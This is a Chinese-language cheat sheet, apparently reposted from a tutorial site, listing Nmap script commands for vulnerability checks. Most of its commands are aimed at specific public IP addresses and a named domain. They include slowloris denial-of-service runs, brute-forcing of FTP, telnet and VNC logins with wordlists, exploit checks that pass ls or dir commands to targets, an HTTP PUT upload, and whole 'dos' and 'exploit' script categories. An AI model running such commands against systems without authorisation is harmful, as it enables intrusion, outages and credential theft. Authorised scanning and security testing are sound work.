Nmap掃描漏洞


1 http 拒絕服務
nmap –max-parallelism 800–script http-slowloris scanme.nmap.org

2 IIS 短文件泄露

nmap -p 8080 –script http-iis-short-name-brute 61.142.64.176

3 ftp弱口令暴力破解

nmap –script ftp-brute –script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153

4 檢測CVE-2011-2523中的ftp-vsftpd-backdoor

nmap -T2 –script ftp-vsftpd-backdoor 211.139.201.240

5 驗證http中開啟的-methods 方法

nmap -T3 –script http-methods –script-args http.test-all=true,http.url-path=/www.haoshangjia.com

6 驗證HTTP.sys 遠程代碼執行

nmap -sV –script http-vuln-cve2015-1635 203.195.139.153

7驗證 SSL POODLE information leak

nmap -sV -p 443 –version-light –script ssl-poodle 218.19.141.16

8 驗證http 中開啟了put 方法

nmap –script http-put –script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16

9 驗證mysql 匿名訪問

nmap –script mysql-empty-password 203.195.139.153

10 驗證cve2015-1427 漏洞
nmap –script http-vuln-cve2015-1427 –script-args command=ls 203.195.139.153

11 驗證cve2014-8877漏洞
nmap -Pn –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128

12 驗證Cisco ASA中的CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129漏洞

nmap -p 443 –script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153

13驗證低安全的 SSHv1,sslv2協議

nmap –script sshv1,sslv2 www.haoshangjia.com

14 驗證CVE-2014-0224 ssl-ccs-injection
nmap -Pn –script ssl-ccs-injection 203.195.139.153

15 驗證ssl-cert證書問題

nmap -v -v –script ssl-cert 203.195.139.153

16驗證SSL證書的有限期

nmap -Pn –script ssl-date www.haoshangjia.com

17 驗證CVE-2014-0160 OpenSSL Heartbleed bug

nmap -p 443 –script ssl-heartbleed,ssl-known-key 203.195.139.153

18 驗證 Debian OpenSSL keys

nmap -p 443 –script ssl-known-key 203.195.139.153

18 驗證弱加密SSL套件

nmap –script ssl-enum-ciphers 203.195.139.153

20 驗證CVE 2015-4000

nmap –script ssl-dh-params www.haoshangjia.com

21 驗證多種SSL漏洞問題

nmap 203.195.139.153 –vv –script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2

22 在網絡中檢測某主機是否存在竊聽他人流量

nmap –script sniffer-detect 10.10.167.5

23 暴力破解telnet

nmap -p 23 –script telnet-brute –script-args userdb=myusers.lst,passdb=mypwds.lst –script-args telnet-brute.timeout=8s 203.195.139.153

24 驗證telnet是否支持加密

nmap –script telnet-encryption 203.195.139.153

25 精准地確認端口上運行的服務

nmap -sV –script unusual-port 42.96.170.128

26 收集VNC信息

nmap –script vnc-info 203.195.139.153

27 暴力破解VNC

nmap –script vnc-brute –script-args brute.guesses=6,brute.emptypass=true,userdb=/root/dictionary/user.txt,brute.useraspass=true,passdb=/root/dictionary/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128

這個腳本挺長的,很多詳細的參數,請參閱腳本的具體參數。
0x03 使用系列的nmap NSE 進行檢查

nmap腳本主要分為以下幾類,在掃描時可根據需要設置–script=類別這種方式進行比較籠統的掃描:
auth: 負責處理鑒權證書(繞開鑒權)的腳本
broadcast: 在局域網內探查更多服務開啟狀況,如dhcp/dns/sqlserver等服務
brute: 提供暴力破解方式,針對常見的應用如http/snmp等
default: 使用-sC或-A選項掃描時候默認的腳本,提供基本腳本掃描能力
discovery: 對網絡進行更多的信息,如SMB枚舉、SNMP查詢等
dos: 用於進行拒絕服務攻擊
exploit: 利用已知的漏洞入侵系統
external: 利用第三方的數據庫或資源,例如進行whois解析
fuzzer: 模糊測試的腳本,發送異常的包到目標機,探測出潛在漏洞
intrusive: 入侵性的腳本,此類腳本可能引發對方的IDS/IPS的記錄或屏蔽
malware: 探測目標機是否感染了病毒、開啟了后門等信息
safe: 此類與intrusive相反,屬於安全性腳本
version: 負責增強服務與版本掃描(Version Detection)功能的腳本
vuln: 負責檢查目標機是否有常見的漏洞(Vulnerability)

Nmap提供的腳本命令行參數如下:
-sC: 等價於–script=default,使用默認類別的腳本進行掃描。
–script=: 使用某個或某類腳本進行掃描,支持通配符描述
–script-args=

nmap –sC 203.195.139.153
5 使用nmap 進行信息挖掘

nmap –script discovery 203.195.139.153

6 使用nmap 進行拒絕服務攻擊

nmap –script dos 203.195.139.153

7 使用nmap 利用已知的漏洞入侵系統

nmap –script exploit 203.195.139.153

8 使用nmap 進行利用第三方的數據庫或資源進行信息收集或者攻擊

nmap –script external 203.195.139.153

9 使用nmap 進行模糊測試,發送異常的包到目標機,探測出潛在漏洞

nmap –script fuzzer 203.195.139.153

10 使用nmap 進行入侵,此類腳本可能引發對方的IDS/IPS的記錄或屏蔽

nmap –script intrusive 203.195.139.153

11 使用nmap 探測目標機是否感染了病毒、開啟了后門等信息

nmap –script malware 203.195.139.153

12 使用nmap 對系統進行安全檢查

nmap –script safe 203.195.139.153

13 使用nmap 對目標機進行檢查是否存在常見的漏洞

nmap –script vuln 203.195.139.153

14 使用nmap 負責增強服務與版本掃描(Version Detection)功能的腳本

nmap –script version 203.195.139.153


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM